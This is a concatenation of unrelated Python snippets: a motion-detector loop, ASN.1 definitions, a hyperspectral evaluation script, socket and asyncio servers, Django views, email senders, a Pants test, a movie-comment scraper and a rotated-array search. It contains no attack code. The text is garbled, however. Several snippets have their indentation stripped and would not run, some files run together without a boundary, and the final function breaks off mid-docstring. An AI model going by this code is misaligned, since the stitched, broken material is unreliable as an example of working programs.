            #shoot() #Play fire sound and vibration
            pass
        elif (status == DETECTED and not isDetected() ):
            # Falling transition: no motion for TIME_DETECTION seconds.
            print "Target lost"
            status = NOT_DETECTED
            GPIO.output(PIN_LED, False)
            retract()
            speak(SOUNDS_MISS)
        #if (status == NOT_DETECTED and not isDetected() ):
        #    print "Still not detected"
        time.sleep(TIME_LOOP)
except KeyboardInterrupt:
    print "Quit"
    # Reset GPIO settings
    GPIO.output(PIN_LED, False)
    GPIO.cleanup()
|
# Add two integers and show the result.
a = 100
b = 200
c = a + b
print(c)
|
from pyasn1.type.namedtype import NamedType, NamedTypes, OptionalNamedType, DefaultedNamedType
from pyasn1.type.namedval import NamedValues
from asn1PERser.classes.data.builtin import *
from asn1PERser.classes.types.type import AdditiveNamedTypes
from asn1PERser.classes.types.constraint import MIN, MAX, NoConstraint, ExtensionMarker, SequenceOfValueSize, \
ValueRange, SingleValue, ValueSize, ConstraintOr, ConstraintAnd
# ASN.1 type definitions in asn1PERser's generated-code style.
# NOTE(review): indentation reconstructed to match the library's usual
# layout — inner classes carry per-field constraints, the outer class-level
# `subtypeSpec = ExtensionMarker(True)` marks the type as extensible.
class MyEnum(EnumeratedType):
    # ENUMERATED { one(0), two(1) }
    enumerationRoot = NamedValues(
        ('one', 0),
        ('two', 1),
    )
    namedValues = enumerationRoot
class MySeq(SequenceType):
    # SEQUENCE { i0 INTEGER (10..20), i1 INTEGER }
    class i0(IntegerType):
        subtypeSpec = ValueRange(10, 20)
    rootComponent = AdditiveNamedTypes(
        NamedType('i0', i0()),
        NamedType('i1', IntegerType()),
    )
    componentType = rootComponent
class Data1(SequenceType):
    # Extensible SEQUENCE: root field d0, extension group [[d1, d2]].
    class d1(BitStringType):
        subtypeSpec = ValueSize(1, 20, extensionMarker=True)
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('d0', OctetStringType()),
    )
    extensionAdditionGroups = [
        AdditiveNamedTypes(
            NamedType('d1', d1()),
            NamedType('d2', MySeq()),
        ),
    ]
    componentType = rootComponent + extensionAdditionGroups
class Data2(ChoiceType):
    # Extensible CHOICE: root alternative c0, extension groups
    # [[c1, c2]] and [[c3, c4]].
    class c0(IntegerType):
        subtypeSpec = ValueRange(1, MAX)
    class c3(OctetStringType):
        subtypeSpec = ValueSize(5, 10)
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('c0', c0()),
    )
    extensionAdditionGroups = [
        AdditiveNamedTypes(
            NamedType('c1', MyEnum()),
            NamedType('c2', BooleanType()),
        ),
        AdditiveNamedTypes(
            NamedType('c3', c3()),
            NamedType('c4', MySeq()),
        ),
    ]
    componentType = rootComponent + extensionAdditionGroups
class Data3(SequenceType):
    # Extensible SEQUENCE with both loose extension additions (s4, s5)
    # and grouped additions [[s1, s2 OPTIONAL]] and [[s3, s6]].
    class s3(IntegerType):
        subtypeSpec = ValueRange(-10, 100)
    subtypeSpec = ExtensionMarker(True)
    rootComponent = AdditiveNamedTypes(
        NamedType('s0', IntegerType()),
    )
    extensionAddition = AdditiveNamedTypes(
        NamedType('s4', IntegerType()),
        NamedType('s5', IntegerType()),
    )
    extensionAdditionGroups = [
        AdditiveNamedTypes(
            NamedType('s1', MySeq()),
            OptionalNamedType('s2', IntegerType()),
        ),
        AdditiveNamedTypes(
            NamedType('s3', s3()),
            NamedType('s6', MyEnum()),
        ),
    ]
    componentType = rootComponent + extensionAddition + extensionAdditionGroups
|
from keras.utils import to_categorical
from keras.models import load_model
from sklearn.model_selection import StratifiedKFold
import numpy as np
import pandas as pd
import spectral
import cv2
import matplotlib.pyplot as plt
from sklearn.metrics import precision_recall_fscore_support, accuracy_score, cohen_kappa_score, confusion_matrix
from utils import load_data, AA_andEachClassAccuracy, load_HSISAT, Patch, applyPCA, padWithZeros
import keras.backend as k
import tensorflow as tf
k.set_image_data_format('channels_last')
# import os
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # Uncomment to use CPU instead o GPU
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
LOAD DATASET
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Select dataset. Options are 'Kochia', 'IP', 'PU', 'SA', or 'EUROSAT'
dataset = 'IP'
train_x, train_y = load_data(dataset=dataset, test=True)
if dataset == 'Kochia':
classes = 3
elif dataset == 'EUROSAT':
classes = 10
else:
classes = int(np.max(train_y)) + 1
print("Dataset correctly imported")
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
EVALUATION
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
windowSize = train_x.shape[1]
kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=7)
cvoa = []
cvaa = []
cvka = []
cvpre = []
cvrec = []
cvf1 = []
# Select Network. Options are 'hyper3dnet', 'hybridsn', 'spectrum',
# 'resnet50' (expect for Kochia), or 'kochiafc' (only for Kochia)
network = 'hyper3dnet'
# Initialize
confmatrices = np.zeros((10, int(classes), int(classes)))
ntrain = 1
model = None
for train, test in kfold.split(train_x, train_y):
k.clear_session()
ytest = to_categorical(train_y[test], num_classes=classes).astype(np.int32)
# Load network and weights of the 'ntrain'-fold
model = load_model("weights/" + dataset + "/" + network + "/weights-" + network + dataset + str(ntrain) + ".h5")
model.trainable = False
# Predict results
ypred = model.predict(train_x[test])
# Calculate confusion matrix
sess = tf.compat.v1.Session()
with sess.as_default():
con_mat = tf.math.confusion_matrix(labels=np.argmax(ytest, axis=-1),
predictions=np.argmax(ypred, axis=-1)).numpy()
con_mat_norm = np.around(con_mat.astype('float') / con_mat.sum(axis=1)[:, np.newaxis], decimals=3)
classes_list = list(range(0, int(classes)))
con_mat_df = pd.DataFrame(con_mat_norm, index=classes_list, columns=classes_list)
confmatrices[ntrain - 1, :, :] = con_mat_df.values
# Calculate metrics
oa = accuracy_score(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
confusion = confusion_matrix(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
each_acc, aa = AA_andEachClassAccuracy(confusion)
kappa = cohen_kappa_score(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1))
prec, rec, f1, support = precision_recall_fscore_support(np.argmax(ytest, axis=1), np.argmax(ypred, axis=-1),
average='macro')
# Add metrics to the list
cvoa.append(oa * 100)
cvaa.append(aa * 100)
cvka.append(kappa * 100)
cvpre.append(prec * 100)
cvrec.append(rec * 100)
cvf1.append(f1 * 100)
ntrain = ntrain + 1
# Selects the fold with the minimum performance
nmin = np.argmin(cvoa)
model = load_model("weights/" + dataset + "/" + network + "/weights-" + network + dataset + str(nmin + 1) + ".h5")
model.trainable = False
file_name = "classification_report_hyper3dnet" + dataset + ".txt"
with open(file_name, 'w') as x_file:
x_file.write("Overall accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvoa)), float(np.std(cvoa))))
x_file.write('\n')
x_file.write("Average accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvaa)), float(np.std(cvaa))))
x_file.write('\n')
x_file.write("Kappa accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvka)), float(np.std(cvka))))
x_file.write('\n')
x_file.write("Precision accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvpre)), float(np.std(cvpre))))
x_file.write('\n')
x_file.write("Recall accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvrec)), float(np.std(cvrec))))
x_file.write('\n')
x_file.write("F1 accuracy%.3f%% (+/- %.3f%%)" % (float(np.mean(cvf1)), float(np.std(cvf1))))
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
PLOT
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
# Segmentation result
if dataset == 'IP' or dataset == 'PU' or dataset == 'SA':
X, y = load_HSISAT(dataset)
height = y.shape[0]
width = y.shape[1]
X, pca = applyPCA(X, numComponents=30)
X = padWithZeros(X, windowSize // 2)
# calculate the predicted image
outputs = np.zeros((height, width))
for i in range(height):
for j in range(width):
target = int(y[i, j])
if target == 0:
continue
else:
image_patch = Patch(X, i, j, windowSize)
print(i, " ", j)
X_test_image = image_patch.reshape(1, image_patch.shape[0], image_patch.shape[1],
image_patch.shape[2]).astype('float32')
prediction = (model.predict(X_test_image))
prediction = np.argmax(prediction, axis=1)
outputs[i][j] = prediction + 1
# Print Ground-truth, network output, and comparison
colors = spectral.spy_colors
colors[1] = [125, 80, 0]
colors[2] = [80, 125, 0]
colors[4] = [255, 0, 0]
colors[10] = [150, 30, 100]
colors[11] = [200, 100, 0]
ground_truth = spectral.imshow(classes=y, figsize=(7, 7), colors=colors)
spectral.save_rgb('weights/' + dataset + network + 'dataset_gt.png', y, colors=colors)
predict_image = spectral.imshow(classes=outputs.astype(int), figsize=(7, 7), colors=colors)
spectral.save_rgb('weights/' + dataset + network + 'dataset_out.png', outputs.astype(int), colors=colors)
outrgb = cv2.imread('weights/' + dataset + network + 'dataset_out.png', cv2.IMREAD_COLOR)
outrgb = cv2.cvtColor(outrgb, cv2.COLOR_BGR2RGB)
for i in range(height):
for j in range(width):
if y[i, j] != outputs.astype(int)[i, j]:
outrgb[i, j] = [255, 255, 0] # Mark the errors in yellow
plt.figure()
plt.imshow(outrgb)
|
import socket
# One-shot UDP echo demo (Python 2: print statement, str payloads).
ServerSock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ServerSock.bind(('localhost',7777))
# Block until a single datagram (up to 1000 bytes) arrives, reply 'xiu'
# to the sender, then shut down.
(ClientMsg, (ClientIP, ClientPort)) = ServerSock.recvfrom(1000)
ServerSock.sendto('xiu', (ClientIP, ClientPort))
print 'Client Message', ClientMsg
ServerSock.close()
|
import asyncio
import primes
from concurrent.futures import ProcessPoolExecutor as Pool
# Process pool so CPU-bound prime computation doesn't block the event loop.
pool = Pool(max_workers=8)
async def primes_server(address):
    # Accept connections forever, dispatching each to primes_handler.
    server = await asyncio.start_server(primes_handler, *address)
    addr = server.sockets[0].getsockname()
    print(f"start on {addr}")
    await server.serve_forever()
async def primes_handler(reader, writer):
    """Per-connection loop: read an integer, compute primes up to it in a
    worker process, write the result back.

    Fixes an infinite busy loop on disconnect: reader.read() returns b"" at
    EOF, int(b"") raises ValueError, and the original's `continue` then spun
    forever re-reading a closed stream — its cleanup code was unreachable.
    The writer is also close()d before wait_closed().
    """
    while True:
        data = await reader.read(100000)
        if not data:
            # EOF: the client closed its end of the connection.
            break
        try:
            prime_to_test = int(data)
        except ValueError:
            # Non-numeric input: ignore and wait for the next request.
            continue
        # CPU-bound work runs in the process pool so the event loop stays free
        # (threads were tried and rejected — the GIL serializes pure-Python work).
        loop = asyncio.get_running_loop()
        result = await loop.run_in_executor(pool, primes.primes_up_to, prime_to_test)
        writer.write(f'result for {prime_to_test} = {result}'.encode("utf-8"))
        await writer.drain()
    print("conn closed")
    writer.close()
    await writer.wait_closed()
if __name__ == "__main__":
asyncio.run(primes_server(("", 25000))) |
# -*- coding: utf-8 -*-
'''
Management of artifactory repositories
======================================
:depends: - requests Python module
:configuration: See :py:mod:`salt.modules.artifactory` for setup instructions.
.. code-block:: yaml
local_artifactory_repo:
artifactory_repo.repo_present:
- name: remote_artifactory_repo
- package_type: generic
- repo_type: local
remote_artifactory_repo:
artifactory_repo.repo_present:
- name: remote_artifactory_repo
- repo_type: remote
- url: "http://totheremoterepo:80/"
'''
def __virtual__():
'''
Only load if the artifactory module is in __salt__
'''
return True
def repo_present(name, repo_type, package_type, url=None, **kwargs):
    '''
    Ensures that the artifactory repo exists
    :param name: new repo name
    :param description: short repo description
    '''
    ret = {
        'name': name,
        'changes': {},
        'result': True,
        'comment': 'Repository "{0}" already exists'.format(name),
    }
    # Look the repo up first; the execution module returns an 'Error' key
    # when it does not exist.
    existing = __salt__['artifactory_repo.repo_get'](name=name, **kwargs)
    if 'Error' in existing:
        # Not found: create it and record the change.
        __salt__['artifactory_repo.repo_create'](name, repo_type, package_type, url, **kwargs)
        ret['comment'] = 'Repository "{0}" has been added'.format(name)
        ret['changes']['repo'] = 'Created'
    # else: already present — updating an existing repo is not implemented.
    return ret
|
"""
Created on Sun Nov 22 17:26:01 2015
Script will do sentiment analysis on restaurant reviews.
@author: Ricky
"""
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.ensemble import VotingClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.pipeline import Pipeline
from nltk.util import ngrams
import re
from sklearn import linear_model
# Output file for the predicted labels (one per test review).
fileWriter = open('out.txt','w')
# English stopword list (NLTK's standard set, inlined) used to filter
# trigrams in the loaders below.
mystopwords = ['i', 'me', 'my', 'myself', 'we', 'our', 'ours', 'ourselves', 'you', 'your', 'yours',
               'yourself', 'yourselves', 'he', 'him', 'his', 'himself', 'she', 'her', 'hers',
               'herself', 'it', 'its', 'itself', 'they', 'them', 'their', 'theirs', 'themselves',
               'what', 'which', 'who', 'whom', 'this', 'that', 'these', 'those', 'am', 'is', 'are',
               'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does',
               'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until',
               'while', 'of', 'at', 'by', 'for', 'with', 'about', 'against', 'between', 'into',
               'through', 'during', 'before', 'after', 'above', 'below', 'to', 'from', 'up', 'down',
               'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further', 'then', 'once', 'here',
               'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more',
               'most', 'other', 'some', 'such', 'no', 'nor', 'not', 'only', 'own', 'same', 'so',
               'than', 'too', 'very', 's', 't', 'can', 'will', 'just', 'don', 'should', 'now']
def loadData(fname):
    """Read tab-separated "<review>\\t<rating>" lines from `fname`.

    Each review is normalized — "not "/"Not " are glued to the following
    word so negations survive tokenization, <br> tags become spaces, runs
    of spaces collapse — and lower-cased.

    Returns (reviews, labels) with labels as ints.

    Cleanup: the original built trigrams per line and filtered them against
    the stopword list, but discarded every result (the loop body was only
    `continue`); that dead code — and its nltk dependency — was removed.
    The file is now closed via a context manager even on error.
    """
    reviews = []
    labels = []
    with open(fname) as f:
        for line in f:
            review, rating = line.strip().split('\t')
            # Glue negations to the next word: "not bad" -> "notbad".
            review = re.sub('not ', 'not', review)
            review = re.sub('Not ', 'Not', review)
            review = re.sub('<br>', ' ', review)
            review = re.sub(' +', ' ', review)
            reviews.append(review.lower())
            labels.append(int(rating))
    return reviews, labels
def loadTrainData(fname):
    """Read one unlabeled review per line from `fname`.

    Applies the same normalization as loadData (negation gluing, <br>
    stripping, space collapsing, lower-casing) and returns the list of
    cleaned reviews.

    Cleanup: the dead trigram/stopword loop from the original (it filtered
    nothing and discarded its results) was removed, along with its nltk
    dependency; the file is closed via a context manager.
    """
    reviews = []
    with open(fname) as f:
        for line in f:
            review = line.strip()
            # Glue negations to the next word: "not bad" -> "notbad".
            review = re.sub('not ', 'not', review)
            review = re.sub('Not ', 'Not', review)
            review = re.sub('<br>', ' ', review)
            review = re.sub(' +', ' ', review)
            reviews.append(review.lower())
    return reviews
rev_train,labels_train=loadData('training.txt')
rev_test=loadTrainData('testing.txt')
# Candidate pipelines: bag-of-words variants feeding different classifiers.
# Uni+bi-grams + multinomial Naive Bayes.
MNB_pipeline = Pipeline([('vect', CountVectorizer(ngram_range = (1, 2))),
                         ('clf', MultinomialNB(alpha = 1.0, fit_prior = True)),
                         ])
# KNN pipeline is defined but excluded from the ensemble below.
KNN_pipeline = Pipeline([('vect', CountVectorizer()),
                         ('clf', KNeighborsClassifier(n_neighbors = 20)),
                         ])
# SGD with log loss so it can emit probabilities for soft voting.
SGD_pipeline = Pipeline([('vect', CountVectorizer()),
                         ('clf', linear_model.SGDClassifier(loss='log')),
                         ])
# Counts -> TF-IDF -> logistic regression.
LR_pipeline = Pipeline([('vect', CountVectorizer()),
                        ('tfidf', TfidfTransformer(norm = 'l2', use_idf = True, smooth_idf = True, sublinear_tf = True)),
                        ('clf', LogisticRegression(warm_start = True, random_state = 1)),
                        ])
# Weighted soft-voting ensemble of the three probabilistic pipelines.
eclf = VotingClassifier(estimators=[('MNB', MNB_pipeline), ('SGD',SGD_pipeline), ('LR', LR_pipeline)], voting = 'soft', weights = [3,2,3])
#('KNN', KNN_pipeline),
eclf.fit(rev_train,labels_train)
#use soft voting to predict (majority voting)
pred=eclf.predict(rev_test)
# One predicted label per line in out.txt.
for x in pred:
    fileWriter.write(str(x)+'\n')
fileWriter.close()
|
from django.shortcuts import render, redirect
import random
# Pool of "surprise" values shown to the user; shuffled in place.
VALUES = [
    "alpha",
    "bravo",
    "charlie",
    "delta",
    "echo",
    "foxtrot",
    "golf",
    "hotel",
    "india",
    "juliet",
    "kilo",
    "lima",
    "mike",
]


def shuffle_values():
    """Shuffle VALUES in place (partial Fisher-Yates over the first half).

    Bug fixed: `len(VALUES) / 2` yields a float on Python 3, so range()
    raised TypeError; integer division is used instead.
    """
    for i in range(len(VALUES) // 2):
        j = random.randint(0, len(VALUES) - 1)
        VALUES[i], VALUES[j] = VALUES[j], VALUES[i]
def index(request):
    # Landing page with the nr_items form.
    return render( request, "surprise_me/index.html" )
def ready(request):
    # Shuffle the pool, stash the first nr_items values in the session,
    # then redirect to the results page which reads them back.
    shuffle_values()
    nr_items = int( request.POST['nr_items'] )
    request.session['surprises'] = VALUES[:nr_items]
    return redirect( "/results" )
def results(request):
    # The template reads 'surprises' straight from the session.
    return render( request, "surprise_me/results.html" )
|
# -*- encoding : utf-8 -*-
import pandas as pd
from utils import emailUtils
def emailFormat(content):
    """Render overdue bugs as an HTML table and send it by mail.

    `content` is a sequence of dicts with keys "id", "title", "severity",
    "assignedTo" and "outDate"; each becomes one table row linking to the
    bug in ZenTao.

    Idiom fix: iterates the rows directly instead of indexing with
    `for i in range(len(content))`.
    """
    rows = ""
    print(content)
    for bug in content:
        rows = rows + """
        <tr>
            <td align="center"><a href="http://10.10.12.47/zentao/bug-view-""" + str(bug["id"]) + """.html"> """ + str(bug["id"]) + """</a></td>
            <td width="50%" align="left">""" + str(bug["title"]) + """</td>
            <td align="center">""" + str(bug['severity']) + """</td>
            <td align="center">""" + str(bug['assignedTo']) + """</td>
            <td align="center"> <font color="#FF0000">""" + str(bug['outDate']) + """</font> </td>
        </tr>
        """
    html = """
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <body>
        <div id="container">
        <p><strong>超期Bug未处理列表如下:</strong></p>
        <div id="content">
        <table width="90%" border="1" bordercolor="black" cellspacing="0" cellpadding="0">
            <tr>
                <td align="center"><strong>BugId</strong></td>
                <td align="center"><strong>描述</strong></td>
                <td align="center"><strong>严重等级</strong></td>
                <td align="center"><strong>当前人员</strong></td>
                <td align="center" color="red"><strong>超期(天数)</strong></td>
            </tr>""" + rows + """
        </table>
        </div>
        </div>
        </div>
    </body>
    </html>
    """
    emailUtils.emailConf().sendMail(html)
|
def DoWorkInGenerator(num_work_items):
    # Pattern 1: generator — the worker yields a value (and control) back
    # to the caller in the middle of each work step. (Python 2: print
    # statement, xrange.)
    for i in xrange(num_work_items):
        print 'G do some work here'
        yield i
        print 'G do more work here'
for i in DoWorkInGenerator(3):
    print i
################################################################################
def DoWorkWithCallback(num_work_items, callback):
    # Pattern 2: callback — the worker invokes caller-supplied code in the
    # middle of each step.
    for i in xrange(num_work_items):
        print 'C do some work here'
        callback(i)
        print 'C do more work here'
def MyCallback(i):
    print i
DoWorkWithCallback(3, MyCallback)
################################################################################
class DoWorkBase(object):
    # Pattern 3: template method — the base drives the loop and calls the
    # subclass hook CustomCode() in the middle of each step.
    def __init__(self, num_work_items):
        # The loop variable is deliberately stored on self so CustomCode()
        # can read it.
        for self.i in xrange(num_work_items):
            print 'B do some work here'
            self.CustomCode()
            print 'B do more work here'
    def CustomCode(self):
        raise NotImplementedError()
class DoCustomWork(DoWorkBase):
    def CustomCode(self):
        print self.i
DoCustomWork(3)
################################################################################
class DoWorkInObject(object):
    # Pattern 4: split each step across methods and let the caller drive
    # the sequence explicitly.
    def __init__(self, i):
        print 'O do some work here'
        self.i = i
    def MoreWork(self):
        print 'O do more work here'
for i in xrange(3):
    w = DoWorkInObject(i)
    print w.i
    w.MoreWork()
|
from django.core.mail import EmailMultiAlternatives
from django.template.loader import get_template
from django.template import Context
from newsletter.weather import get_weather_json
from NotiWeather import settings
NICE_OUT_SUBJECT = "It's nice out! Enjoy a discount on us!"
POOR_OUT_SUBJECT = "Not so nice out? That's okay, enjoy a discount on us!"
REGULAR_SUBJECT = "Enjoy a discount on us!"
def send_email(user):
"""
Function that handles the sending of weather-powered emails to users.
This function takes a User instance, retrieves it's weather JSON from
Wunderground, calculates the output for the email subject and body, then
sends the email.
"""
data = get_weather_json(user)
# Exctract necessary variables from JSON
location = data['current_observation']['display_location']['full']
weather_now = data['current_observation']['weather']
temp_now = float(data['current_observation']['temp_f'])
avg_high = float(data['almanac']['temp_high']['normal']['F'])
icon_url = data['current_observation']['icon_url']
readable_weather = '{} degrees, {}.'.format(temp_now, weather_now.lower())
email = user.email
# Set email's subject based on current conditions
# NOTE: We are using the average high temperature in our comparison...
# -- This could be done a variety of ways including using the median of the
# -- average high and low temperature, or using the average low in the
# -- morning/night and the average high during the day.
subject = REGULAR_SUBJECT
if (temp_now >= avg_high+5) or ('clear' in weather_now.lower()):
subject = NICE_OUT_SUBJECT
if (temp_now <= avg_high-5) or ('rain' in weather_now.lower()):
subject = POOR_OUT_SUBJECT
text = get_template('email/newsletter.txt')
html = get_template('email/newsletter.html')
context = Context(
{
'location': location,
'icon_url': icon_url,
'weather': readable_weather
}
)
html_content = html.render(context)
text_content = text.render(context)
message = EmailMultiAlternatives(
subject,
text_content,
settings.EMAIL_HOST_USER,
[email]
)
message.attach_alternative(html_content, 'text/html')
message.send()
|
#!/Users/john/anaconda/bin/python3
# Minimal CGI response: Content-Type header, blank line, then the body.
print("Content-Type: text/html")    # HTML is following
print()                             # blank line, end of headers
print('Hey, this works.')
|
import sys
from .parsing_structure import parse_symbols
__all__ = [
'parse_all_symbols',
'parse_all_sections_symbols',
]
def parse_all_symbols(args):
    """Yield every symbol parsed from the given files, or from stdin when
    `args` is empty."""
    if args:
        for path in args:
            with open(path) as handle:
                for sym in parse_symbols(handle, path):
                    yield sym
    else:
        for sym in parse_symbols(sys.stdin, 'stdin'):
            yield sym
def parse_all_sections_symbols(args):
    """Parse all inputs, accumulating results into shared dicts.

    Args:
        args: Iterable of filenames; if empty/falsy, ``sys.stdin`` is parsed.

    Returns:
        A ``(sections, symbols)`` tuple of the two dicts that
        ``parse_symbols`` populates as a side effect.
    """
    sections, symbols = {}, {}
    if args:
        for filename in args:
            #logger.debug('Parsing %s' % filename)
            with open(filename) as handle:
                # Drain the generator purely for its side effects on the dicts.
                for _ in parse_symbols(handle, filename, sections, symbols):
                    pass
    else:
        #logger.debug('Parsing from stdin...')
        for _ in parse_symbols(sys.stdin, 'stdin', sections, symbols):
            pass
    return sections, symbols
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
import pytest
from pants.backend.openapi.util_rules import pom_parser
from pants.backend.openapi.util_rules.pom_parser import AnalysePomRequest, PomReport
from pants.engine.fs import Digest, PathGlobs
from pants.jvm.resolve.common import Coordinate
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
    """Provide a RuleRunner wired with the pom_parser rules and a PomReport query."""
    runner = RuleRunner(
        target_types=[],
        rules=[*pom_parser.rules(), QueryRule(PomReport, (AnalysePomRequest,))],
    )
    runner.set_options(args=[], env_inherit=PYTHON_BOOTSTRAP_ENV)
    return runner
def test_collects_non_test_dependencies(rule_runner: RuleRunner) -> None:
    """Only compile-scope dependencies are reported, with Maven properties
    (e.g. ``${foo.version}``) resolved; test-scoped entries are skipped."""
    pom_contents = dedent(
        """\
        <project xmlns = "http://maven.apache.org/POM/4.0.0"
            xmlns:xsi = "http://www.w3.org/2001/XMLSchema-instance"
            xsi:schemaLocation = "http://maven.apache.org/POM/4.0.0
            http://maven.apache.org/xsd/maven-4.0.0.xsd">
            <modelVersion>4.0.0</modelVersion>
            <groupId>com.companyname.project-group</groupId>
            <artifactId>project</artifactId>
            <version>1.0</version>

            <properties>
                <foo.version>1.0</foo.version>
            </properties>

            <dependencies>
                <dependency>
                    <artifactId>foo</artifactId>
                    <groupId>com.example</groupId>
                    <version>${foo.version}</version>
                </dependency>
                <dependency>
                    <artifactId>test</artifactId>
                    <groupId>com.example</groupId>
                    <version>1.0</version>
                    <scope>test</scope>
                </dependency>
            </dependencies>
        </project>
        """
    )
    rule_runner.write_files({"pom.xml": pom_contents})

    pom_digest = rule_runner.request(Digest, [PathGlobs(["pom.xml"])])
    report = rule_runner.request(PomReport, [AnalysePomRequest(pom_digest)])
    # The test-scoped artifact must be absent; ${foo.version} resolves to 1.0.
    assert report.dependencies == (Coordinate("com.example", "foo", "1.0"),)
|
#coding:utf-8
import requests
import json
import time
import random
import io
#下载第一页数据
def get_one_page(url):
    """Download one page of Maoyan comment JSON.

    Returns the response body text, or None when the status is not HTTP 200.
    A browser User-Agent is sent because the mobile endpoint rejects the
    default requests UA.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'
    }
    response = requests.get(url, headers=headers)
    return response.text if response.status_code == 200 else None
#解析第一页数据
def parse_one_page(html):
    """Yield one normalized dict per comment record in the JSON payload *html*.

    The payload is expected to carry its records under the 'cmts' key; the
    'time' field is split so that only the date part (before the space) is kept.
    """
    for record in json.loads(html)['cmts']:
        yield {
            'comment': record['content'],
            'date': record['time'].split(' ')[0],
            'rate': record['score'],
            'city': record['cityName'],
            'nickname': record['nickName'],
        }
#保存数据到文本文档
def save_to_txt():
    """Download the first 100 pages of comments and append them to yaoshen.txt.

    Each record becomes one comma-separated line: date,nickname,city,rate,comment.
    A randomized ~5-10 second pause between pages keeps the request rate polite.

    Fix: the original re-opened the output file once per comment inside the
    inner loop; the open is hoisted to once per page (identical file contents,
    far fewer open/close cycles).
    """
    for i in range(1, 101):
        url = 'http://m.maoyan.com/mmdb/comments/movie/1200486.json?_v_=yes&offset=' + str(i)
        html = get_one_page(url)
        print('正在保存第%d页。' % i)
        with io.open('yaoshen.txt', 'a', encoding='utf-8') as f:
            for item in parse_one_page(html):
                f.write(item['date'] + ',' + item['nickname'] + ',' + item['city'] + ',' + str(item['rate']) + ',' + item['comment'] + '\n')
        time.sleep(5 + float(random.randint(1, 100)) / 20)
#
def xie_zheng(infile, outfile):
    """Copy *infile* to *outfile*, dropping duplicate lines (first occurrence wins).

    Fixes over the original:
    - `with` context managers so the handles are closed even on error
      (the original leaked both files if an exception occurred mid-copy);
    - a `set` for the seen-lines membership test instead of a list,
      turning the accidental O(n^2) scan into O(n).

    Args:
        infile: Path of the UTF-8 text file to read.
        outfile: Path of the UTF-8 text file to write (overwritten).
    """
    seen = set()
    with open(infile, 'r', encoding='utf-8') as src, \
         open(outfile, 'w', encoding='utf-8') as dst:
        for line in src:
            if line not in seen:
                seen.add(line)
                dst.write(line)
# Script entry point: run the scrape-and-save pipeline when executed directly.
if __name__ == '__main__':
    save_to_txt()
def numOfRotations(arr, l, r):
    """Return the smallest element of the rotated-sorted slice arr[l..r].

    Binary search for the pivot of a sorted array that was rotated some number
    of times (e.g. [15, 2, 3, 6, 12]).

    NOTE(review): despite the name, this returns the minimum *value*, not the
    rotation count; the count would be that value's index — confirm the
    intended contract with callers before renaming/changing it.

    Args:
        arr: Sorted-then-rotated list with distinct elements.
        l, r: Inclusive index bounds of the slice to search.

    Returns:
        The minimum element of arr[l..r].
    """
    if r - l == 1:
        # Two elements left: the smaller one is the slice minimum.
        # Fix: was `arr[0]`, which is wrong whenever l > 0 (latent — the
        # recursion's invariant happened to avoid it for valid inputs).
        return arr[l] if arr[l] < arr[r] else arr[r]
    if r - l > 1:
        mid = (l + r) // 2
        if arr[mid] < arr[r]:
            # Right half [mid..r] is sorted, so the pivot is at or left of mid.
            return numOfRotations(arr, l, mid)
        else:
            # Pivot lies strictly inside [mid..r].
            return numOfRotations(arr, mid, r)
    # Single-element (or degenerate) range. Fix: was `arr[0]`; use arr[l].
    return arr[l]
# Quick smoke checks: two rotated arrays and one that was never rotated.
# (Print order matches the original: arr, arr1, arr2.)
rotated_small = [15, 2, 3, 6, 12]
sorted_only = [15, 16, 17]
rotated_large = [15, 16, 17, 18, 19, 1, 2, 3]
for data in (rotated_small, rotated_large, sorted_only):
    print(numOfRotations(data, 0, len(data) - 1))
import requests
import json
def get(url, headers=None, queryparams=None):
    """Issue an HTTP GET and return the decoded JSON body.

    Fix: the mutable-default arguments (`headers={}`, `queryparams={}`) are
    replaced with None — requests treats None identically to an empty dict,
    so callers relying on the defaults see no change, and the shared-mutable
    pitfall is gone.

    Args:
        url: Target URL.
